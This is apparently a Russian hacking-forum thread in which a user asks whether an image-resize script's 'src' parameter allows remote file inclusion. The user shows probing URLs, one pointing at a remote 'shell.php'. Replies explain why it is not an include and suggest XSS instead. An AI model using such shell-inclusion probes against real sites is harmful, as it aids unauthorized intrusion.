![]() |
не знаю уязвимость ли это и можно ли это как то юзать....
есть скрипт ресайза и в нём проходит глобальный инклуд, с картинками проходит на ура а вот с остальными форматами не понятно http://site.com/lol.php?src=http://somesite.com/image.jpg проблема в том что я не пойму исполняется ли такой код http://site.com/lol.php?src=http://somesite.com/shell.php потому что в ответ получаю вот что получается что браузер выдаёт мне нерабочую картинку так как ответ возвращается в тЭге скорее всего скрипт не фильтрует форматы файлов, так как подгружаются картинки даже таких видов как http://somesite.com/image.php?u=5199&dateline=11989523 |
Эмм... Тоесть на сервер такой скрипт
PHP код:
Хотя XSS может прокатить |
Цитата:
http://site.com/lol.php?src=112222.jpg&w=709&h=696 то есть выполнение кода не происходит....засада( |
Тут инклуда и быть не может. Только если разработчик движка наркоман и к пхп-коду решил подключать картинку =)
Если в исходнике присутствует текст из запроса, есть вероятность внедрения JS кода, то есть XSS upd: Смысл пхп-инклуда в том, чтобы внедрить свой код, который выполнится на сервере. Картинки - это всего лишь ссылки в получаемом от сервера html-коде. Браузер скачивает картинки по этим ссылкам и выводит их на страницу. |
| Время: 20:25 |